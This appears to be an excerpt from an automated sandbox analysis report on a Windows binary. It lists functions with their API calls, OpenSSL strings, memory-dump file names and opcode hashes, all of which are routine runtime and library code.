                                  • Instruction ID: 14f257e2f22e167ac5bbd82575063f0a2af15e0e2e88bffe823f3775c1bfc326
                                  • Opcode Fuzzy Hash: 5624e2cd6938f38b38c48a75bf6f8190fb3b089ae93450eddaacfb0e609d12f1
                                  • Instruction Fuzzy Hash: AD01F73290A6117EA76427F57C89867275BEB02BB4720072EF5249B2F2EF518C859254
                                  Function 005CC666 Relevance: 9.1, APIs: 6, Instructions: 56COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 005CC673
                                  • SHBrowseForFolderW.SHELL32 ref: 005CC691
                                  • CoUninitialize.OLE32 ref: 005CC6EA
                                    • Part of subcall function 005C5C2D: RtlAllocateHeap.NTDLL(00000008,00010000,005C68A1,?,00000000,006D95B4), ref: 005C5C36
                                  • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 005CC6AF
                                    • Part of subcall function 005C5CD2: RtlFreeHeap.NTDLL(00000000,00000000,005C60D8), ref: 005C5CDB
                                  • SHGetMalloc.SHELL32(?), ref: 005CC6C6
                                  • CoTaskMemFree.OLE32(00000000), ref: 005CC6E4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: FreeHeap$AllocateBrowseFolderFromInitializeListMallocPathTaskUninitialize
                                  • String ID:
                                  • API String ID: 246964227-0
                                  • Opcode ID: 5006d706052ca238920df860e82e684e3342e7f7c07b37d4857f503f6e94327a
                                  • Instruction ID: b9037620396e546a66309cc9aeae33bd8ccec4d840e22b29763d3bfea2c24268
                                  • Opcode Fuzzy Hash: 5006d706052ca238920df860e82e684e3342e7f7c07b37d4857f503f6e94327a
                                  • Instruction Fuzzy Hash: 92017C72600214AFC710EBE8DC0DE9A7FEDEF8AB05B001168F906DB211EA209D42C7A1
                                  Function 00674D9C Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,00669D63,?,?,?,0066A36A,?,?,?,?), ref: 00674DA0
                                  • _free.LIBCMT ref: 00674DD3
                                  • _free.LIBCMT ref: 00674DFB
                                  • SetLastError.KERNEL32(00000000,?,?,?), ref: 00674E08
                                  • SetLastError.KERNEL32(00000000,?,?,?), ref: 00674E14
                                  • _abort.LIBCMT ref: 00674E1A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_free$_abort
                                  • String ID:
                                  • API String ID: 3160817290-0
                                  • Opcode ID: d3d452977a8bd55121e0671f415687f842f7dac1c010a1b556a520b9ca3b7b3d
                                  • Instruction ID: c37ac63a792e1ef2339ce49adbbaa33920029d541d51db6680b17d3179c3b440
                                  • Opcode Fuzzy Hash: d3d452977a8bd55121e0671f415687f842f7dac1c010a1b556a520b9ca3b7b3d
                                  • Instruction Fuzzy Hash: 03F02836540A0037D3622324BC0EBAB275B9FC2771B25811DF41CE63E2EF7089025564
                                  Function 005C671D Relevance: 9.0, APIs: 6, Instructions: 39synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 005C673A
                                  • CloseHandle.KERNEL32 ref: 005C6746
                                  • WaitForSingleObject.KERNEL32(000000FF), ref: 005C6761
                                  • CloseHandle.KERNEL32 ref: 005C676D
                                  • DeleteCriticalSection.KERNEL32(006D95B4), ref: 005C677D
                                  • CloseHandle.KERNEL32 ref: 005C6789
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CloseHandle$ObjectSingleWait$CriticalDeleteSection
                                  • String ID:
                                  • API String ID: 299037165-0
                                  • Opcode ID: 66f4346b7492ffcbbacfb91efc2ec9982387cafdc63fb60dc483bf6ae46d9331
                                  • Instruction ID: a1faf4c2725d97ccf757947bc47926429e8606439a9303a6ce1fb43e53eef0cf
                                  • Opcode Fuzzy Hash: 66f4346b7492ffcbbacfb91efc2ec9982387cafdc63fb60dc483bf6ae46d9331
                                  • Instruction Fuzzy Hash: F401FB71D16165AED712AFA4FC08B553BA7FB09729B14273BF120D51F4CB724881DBA0
                                  Function 005D6B00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 122COMMON
                                  Download Yara Rule
                                  APIs
                                  • ___from_strstr_to_strchr.LIBCMT ref: 005D6C33
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ___from_strstr_to_strchr
                                  • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                  • API String ID: 601868998-2416195885
                                  • Opcode ID: 84950d6d7e32ed77d2ca35d6d86390d2b558628601eb7a2e860947ecfc8d1b7d
                                  • Instruction ID: fb9dd150e5d736e943e3103ab6580db1b0fb4413f48faae3a4c7d182fbcd73ab
                                  • Opcode Fuzzy Hash: 84950d6d7e32ed77d2ca35d6d86390d2b558628601eb7a2e860947ecfc8d1b7d
                                  • Instruction Fuzzy Hash: BA410F716043469BDB30EF58CC85BABBBD9FF91304F04086FE585E3242E674E90987A2
                                  Function 005EC5D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 91COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 005F58B0: MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,?,?,?,?,005EC5E1,?,?,?,?,?), ref: 005F58FB
                                    • Part of subcall function 005F58B0: GetLastError.KERNEL32(?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C,?,005EEF14,?,00000002,?,?), ref: 005F590D
                                    • Part of subcall function 005F58B0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C), ref: 005F592C
                                    • Part of subcall function 005F58B0: GetLastError.KERNEL32(?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C,?,005EEF14,?,00000002,?,?), ref: 005F5938
                                  • ___from_strstr_to_strchr.LIBCMT ref: 005EC5EB
                                  • GetLastError.KERNEL32(..\..\openssl-1.1.0f\crypto\bio\bss_file.c,0000004A), ref: 005EC60C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ErrorLast$ByteCharMultiWide$___from_strstr_to_strchr
                                  • String ID: ','$..\..\openssl-1.1.0f\crypto\bio\bss_file.c$fopen('
                                  • API String ID: 3952923578-1553173387
                                  • Opcode ID: b7b6ed9322d38290edc7f77509eb7906e5a1e288a08a2dc2f9ecc5a17b50852c
                                  • Instruction ID: 9bb9b48707c470e1df1cb88b96d24a4a013c30e2b29a8fd2a2bb75bb4bd1d438
                                  • Opcode Fuzzy Hash: b7b6ed9322d38290edc7f77509eb7906e5a1e288a08a2dc2f9ecc5a17b50852c
                                  • Instruction Fuzzy Hash: 4621BB76B8131137E57132ED6C0BF5B294AABC5F56F460077F705AA2C3EA81491282B6
                                  Function 005E98FB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 90registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegisterEventSourceW.ADVAPI32(00000000,OpenSSL), ref: 005E99AE
                                  • ReportEventW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 005E99DC
                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 005E99E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Event$Source$DeregisterRegisterReport
                                  • String ID: OpenSSL$no stack?
                                  • API String ID: 3235303502-4104412182
                                  • Opcode ID: 6e33119fdb7a545e2411f91e61683143469ac18cd6c9a0e1a71e984bc3c78d73
                                  • Instruction ID: a49e858cc12dfa740babb77315dee8ada7467c26488bab5cbc3c81342a852595
                                  • Opcode Fuzzy Hash: 6e33119fdb7a545e2411f91e61683143469ac18cd6c9a0e1a71e984bc3c78d73
                                  • Instruction Fuzzy Hash: 93310970610395ABDB289F25CC51BBD7765FF05B00F10419AF986EF192DB319A41D784
                                  Function 006681D3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00668294,?,?,006D89C8,00000000,?,006683BF,00000004,InitializeCriticalSectionEx,006C4FF4,InitializeCriticalSectionEx,00000000), ref: 00668263
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: FreeLibrary
                                  • String ID: api-ms-
                                  • API String ID: 3664257935-2084034818
                                  • Opcode ID: 16a07be8d6eac5122eea3c0cbb7e452db5265c511c82711201b0ab12b8ce1bb4
                                  • Instruction ID: 177f65843bc02875e3c4619e380f696ef712e1aff5d2b6db54a3d522bf96e1b4
                                  • Opcode Fuzzy Hash: 16a07be8d6eac5122eea3c0cbb7e452db5265c511c82711201b0ab12b8ce1bb4
                                  • Instruction Fuzzy Hash: 6211A331A41B25AFDF228B78DC55B9973AEAB46770F250310E911EB280DF60EE0186E1
                                  Function 00668EAF Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00668E60,00000003,?,00668E00,00000003,006CAF90,0000000C,00668F57,00000003,00000002), ref: 00668ECF
                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00668EE2
                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00668E60,00000003,?,00668E00,00000003,006CAF90,0000000C,00668F57,00000003,00000002,00000000), ref: 00668F05
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: d2f41d400a6740461b7cd033d6c7fdb5cab833d0ccfffe49e13962b289bfca81
                                  • Instruction ID: 705e54d955b3ea09fa3effb31338a56f27dab4583e4bca896a678f305c68e1fb
                                  • Opcode Fuzzy Hash: d2f41d400a6740461b7cd033d6c7fdb5cab833d0ccfffe49e13962b289bfca81
                                  • Instruction Fuzzy Hash: A5F04430A00119BFCB215FA4DC19BEEBFBAEF44751F000269F805A6250DF715A81DB94
                                  Function 005F58B0 Relevance: 7.6, APIs: 6, Instructions: 148COMMON
                                  Download Yara Rule
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,00000000,?,?,?,?,005EC5E1,?,?,?,?,?), ref: 005F58FB
                                  • GetLastError.KERNEL32(?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C,?,005EEF14,?,00000002,?,?), ref: 005F590D
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C), ref: 005F592C
                                  • GetLastError.KERNEL32(?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C,?,005EEF14,?,00000002,?,?), ref: 005F5938
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,005EC5E1,?,?,?,?,?,005F2193,?,0069456C), ref: 005F5989
                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,005EC5E1,?,?,?,?,?,005F2193), ref: 005F59B3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 1717984340-0
                                  • Opcode ID: fa82d12ec86da6c5b5a2a0419da4bbaf6ce1339e6075f112af1f6955b68d8a32
                                  • Instruction ID: 4b13b20c32096b0cc0b5475e3cc8685b9d092cd8705172d8abe95a71d2fcbb8c
                                  • Opcode Fuzzy Hash: fa82d12ec86da6c5b5a2a0419da4bbaf6ce1339e6075f112af1f6955b68d8a32
                                  • Instruction Fuzzy Hash: BD410535A00109ABDF209FA4DC52BFEBBA9FF59311F10016AEF05EB241EA355D15C7A1
                                  Function 00674E20 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(00000188,?,006D9048,0066E405,006771D1,00000000,006815F0,005DBB23,00000188,?,00000000,005D6E99,00000188,..\..\openssl-1.1.0f\crypto\err\err.c,0000028F,006D9048), ref: 00674E25
                                  • _free.LIBCMT ref: 00674E5A
                                  • _free.LIBCMT ref: 00674E81
                                  • SetLastError.KERNEL32(00000000,?,?,?,00000000), ref: 00674E8E
                                  • SetLastError.KERNEL32(00000000,?,?,?,00000000), ref: 00674E97
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: ErrorLast$_free
                                  • String ID:
                                  • API String ID: 3170660625-0
                                  • Opcode ID: 6df38a56996f1ba408f7e481c52533e0f7cf944b2c76ceb583c6116002192a73
                                  • Instruction ID: ab40d3b9858aac685177f60d2fc26534f52ff06ada956dc175ba7735c5ea61f7
                                  • Opcode Fuzzy Hash: 6df38a56996f1ba408f7e481c52533e0f7cf944b2c76ceb583c6116002192a73
                                  • Instruction Fuzzy Hash: 3E01F472541B0077D75267346C4DE9B236FFBC23B5726812EF51DE6392EFB188025225
                                  Function 00677005 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 0067701D
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 0067702F
                                  • _free.LIBCMT ref: 00677041
                                  • _free.LIBCMT ref: 00677053
                                  • _free.LIBCMT ref: 00677065
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 69636e89b1e833637c630185ced6892fbee8d36c5fc7335c3dd37448434cb26e
                                  • Instruction ID: 225958dc1674122dc2bc387fa8d64d4d402d21e90a2f9de48104bc8901acefb5
                                  • Opcode Fuzzy Hash: 69636e89b1e833637c630185ced6892fbee8d36c5fc7335c3dd37448434cb26e
                                  • Instruction Fuzzy Hash: C5F062B3909A0077C770DB64F895D5673EFAA417107A5980AF40DDB700C7B0FCC08664
                                  Function 0066974D Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 0066976B
                                    • Part of subcall function 00675155: HeapFree.KERNEL32(00000000,00000000,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80), ref: 0067516B
                                    • Part of subcall function 00675155: GetLastError.KERNEL32(00674E80,?,0067709C,00674E80,00000000,00674E80,00000000,?,006770C3,00674E80,00000007,00674E80,?,0067780C,00674E80,00674E80), ref: 0067517D
                                  • _free.LIBCMT ref: 0066977D
                                  • _free.LIBCMT ref: 00669790
                                  • _free.LIBCMT ref: 006697A1
                                  • _free.LIBCMT ref: 006697B2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: 820f9fa759057c8e82c87f4da79a6d624654ac2cd618592d45e204aa5c807158
                                  • Instruction ID: 7558e9e7a739e9cda23448a7d9437155c28deb230e6a7630e8b21c9d8c056963
                                  • Opcode Fuzzy Hash: 820f9fa759057c8e82c87f4da79a6d624654ac2cd618592d45e204aa5c807158
                                  • Instruction Fuzzy Hash: 5EF054B4D06920AFC792AF24BC459483B67EB09721352618FF8199B370DB7004818FA4
                                  Function 00640470 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 262COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: __aulldiv
                                  • String ID: ..\..\openssl-1.1.0f\crypto\evp\scrypt.c$JKb
                                  • API String ID: 3732870572-3068129427
                                  • Opcode ID: ed7e7772248fedd9ddcf0f02eb6a32f18f047cadf445b3edcd96cd3f9b71a430
                                  • Instruction ID: 40d1dd11e8a3a353b33f131a138a8a055640b303f756b18026503da8c6938e90
                                  • Opcode Fuzzy Hash: ed7e7772248fedd9ddcf0f02eb6a32f18f047cadf445b3edcd96cd3f9b71a430
                                  • Instruction Fuzzy Hash: 8C813531B083105BFB18AEA8DD41A6FF7D7EBC8350F044A3DFB5182290E676DC548A52
                                  Function 005E0F40 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 253COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
